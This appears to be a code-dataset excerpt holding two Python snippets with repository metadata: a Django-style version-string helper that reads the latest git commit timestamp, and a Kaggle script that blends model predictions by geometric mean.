# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if version[2] == 0 else 3
main = '.'.join(str(x) for x in version[:parts])
sub = ''
if version[3] == 'alpha' and version[4] == 0:
git_changeset = get_git_changeset()
if git_changeset:
sub = '.dev%s' % git_changeset
elif version[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[version[3]] + str(version[4])
return str(main + sub)
def get_git_changeset():
"""
Returns a numeric identifier of the latest git changeset.
The result is the UTC timestamp of the changeset in YYYYMMDDHHMMSS format.
This value isn't guaranteed to be unique, but collisions are very unlikely,
so it's sufficient for generating the development version numbers.
"""
repo_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
git_log = subprocess.Popen('git log --pretty=format:%ct --quiet -1 HEAD',
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=True, cwd=repo_dir,
universal_newlines=True)
timestamp = git_log.communicate()[0]
try:
timestamp = datetime.datetime.utcfromtimestamp(int(timestamp))
except ValueError:
return None
return timestamp.strftime('%Y%m%d%H%M%S')
| RyanNoelk/ClanLadder | django_ajax/__init__.py | Python | mit | 1,900 | 0 |
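# Worked examples for get_version() above; none of these reach the git
# lookup, since only ('alpha', 0) versions consult get_git_changeset():
#   get_version((2, 2, 13, 'final', 0)) -> '2.2.13'  (three parts: Z != 0)
#   get_version((2, 2, 0, 'beta', 2))   -> '2.2b2'   (two parts: Z == 0)
#   get_version((3, 0, 0, 'rc', 1))     -> '3.0c1'   (mapping 'rc' -> 'c')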
# -*- coding: utf-8 -*-
import pandas as pd
from itertools import izip
import numpy as np
import glob
from facebook import FacebookCompetition
print('Loading test data')
bids = pd.read_csv(FacebookCompetition.__data__['bids'])
test = pd.read_csv(FacebookCompetition.__data__['test'])
te = pd.merge(test, bids, how='left')
del bids
files = glob.glob('data/facebook.te.*.txt.gz')
its = [iter(pd.read_table(f, header=-1, iterator=True, chunksize=2**15, compression='gzip')) for f in files]
#with open('data/facebook_softmax_20150506.csv', 'w') as out:
c = []
for i,chunks in enumerate(izip(*its)):
print(i)
A = np.array([np.c_[chunk.values,1-chunk.values] for chunk in chunks])
A = np.exp(np.log(A).mean(axis=0))
A /= A.sum(axis=1)[:, np.newaxis]
A = A[:,0]
df = pd.DataFrame(A)
df.index = chunks[0].index
df.columns = chunks[0].columns
c.append(df)
df = pd.concat(c)
df.index = te.bidder_id
df = df.groupby(level=0).mean()
df.columns = ['prediction']
df.to_csv('data/facebook.te.20150509_1.csv', index_label='bidder_id')
| ldamewood/kaggle | facebook/combine.py | Python | mit | 1,058 | 0.005671 |
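# The blending step above is a geometric mean of per-model class
# probabilities: each model contributes (p, 1-p), the logs are averaged
# across models, and the result is renormalised to sum to one. A tiny
# self-contained illustration with made-up numbers:
import numpy as np

preds = np.array([[0.9, 0.1],    # model 1: (p, 1-p)
                  [0.6, 0.4]])   # model 2: (p, 1-p)
blend = np.exp(np.log(preds).mean(axis=0))  # element-wise geometric mean
blend /= blend.sum()                        # renormalise
# blend[0] is the blended positive-class probability (about 0.79 here).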